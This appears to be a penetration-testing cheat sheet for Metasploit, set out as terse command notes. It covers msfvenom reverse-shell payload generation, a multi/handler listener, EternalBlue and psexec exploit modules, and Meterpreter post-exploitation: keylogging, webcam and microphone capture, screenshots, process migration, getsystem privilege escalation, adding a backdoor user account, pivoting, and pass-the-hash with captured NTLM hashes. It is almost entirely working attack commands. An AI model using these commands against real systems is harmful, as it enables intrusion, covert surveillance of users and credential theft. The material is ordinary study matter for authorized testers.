Metasploit

REF:

Metasploit Framework

msfsearch whatever

msfconcole
search Nostromo
use exploit/multi/http/nostromo_code_exec
show options

Format:
Exploit/Payload/Auxiliary/PostModules

Eternal Blue

ms08_067_netapi.rb
  .. eternal blue - messy, memory, could crash system
  .. get out of this as soon as you can and use psexec

ms17_010_psexec.rb   ..eternal blue - friendly version
  .. sends a file, authenticates nicely, runs that file as service
  .. Pentesters Pledge!!

Venom

FtpHttpVulnWebshell

msfvenom -l | grep windows
msfvenom --list encoders
msfvenom --list format
msfvenom --list payloads | grep java
msfvenom --help-formats

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.X.X LPORT=8080 -f exe > /tmp/file.exe

python3 -m http.server   ..share with python (optional)

Silly Windows Powershell "Hello":
- Create "hi.exe"
- Opens Windows Powershell
- Prints "Hello World"

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"Write-Output 'Hello World'\"; pause" -f exe > hi.exe

Listener

> sudo msfconsole
show exploits

     excellent - Works!!!!!
     great     - Might Work
     good      - Blah
     average   - Blah
     low       - Blah
     manual    - Blah

use exploit/multi/handler             
set PAYLOAD windows/shell/reverse_tcp  ..same as venom

show options
set LPORT 8080      ..same as venom/incoming
set LHOST 0.0.0.0   ..any
exploit -j          ..job to background

Sessions

Ctr-C          ..kill session you are in
jobs           ..jobs listening

sessions -h    ..help
sessions -K    ..Kill all sessions
sessions -l    ..list
sessions -i 1  ..interact

Shell

(no autocomplete)

whoami
netstat -na
tasklist
cd c:\
dir
ipconfig
ipconfig /displaydns
net user
net user bob Password1 /add

PrivEsc

getuid    .. www
use priv  .. loading privesc
getsystem .. grab system acct
getuid    .. system

Meterpreter

?        ..help
cd       ..change dir
lcd      ..local cd
pwd   
ls
cat
download
mkdir
edit     ..dont trust this though

sysinfo
shutdown
reboot
reg      ..registry
shell    ..go to the 'normal shell'
exit

kill
execute

screenshot -p my.jpg
screenshot -p /tmp/screen.jpg
idletime
uictl [enable/disable] [keyboard/mouse]
webcam_list
webcam_snap
record_mic

keyscan_start  ..keylogging
keyscan_dump   ..view
keyscan_stop
(Could force putty to crash, and capture their login!)

Migrate

getuid         ..userid
getpid         ..2952

ps             ..process list
ps -h          ..process list (help)
ps -S notepad  ..search for notepad
migrate 3996   ..migrate into notepad
getpid         ..3996

Looking Around

mtp > run post/windows/gather/win_privs cd\ & dir /b /s proof.txt type c:\pathto\proof.txt

Pivot

use exploit1
set RHOST victim1
set PAYLOAD xyz
exploit
mtp> ctrl-z or background
msf> route add victim2subnet netmask sid
use exploit2
set RHOST victim2
set PAYLOAD xyz
exploit

Did not try this one:
MTP> portfwd add -l 5555 -p 22 -r Target2

Pass the Hash

Pass the HASH to Metasploit
Must come from: system, ram, sam-db, ntds.dit
Not sniffed from the network (diff salts)
Note: Patch in 2014 Local account is now disabled over network

Pass the HASH to metasploit:
Must come from: system, ram, sam-db, ntds.dit
Not sniffed from the network (diff salts)
Note: Patch in 2014
Local account is now disabled over network

msfconsole
msf> use exploit/windows/smb/psexec
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set RHOSTS 10.10.10.10
msf> set LHOSTS 10.10.x.x
msf> set smbuser monk
msf> set smbpass LMHASHXXX:NTHASHXXX
msf> exploit       ..error: Exploit failed ActiveRecord
msf> db_disconnect ..fix the bug in metasploit
msf> exploit       ..win!

getuid
getpid
ifconfig
shell
net user
net user bob Password1 /add

Previousheartbleed NextMySql

Last updated 2 years ago

Was this helpful?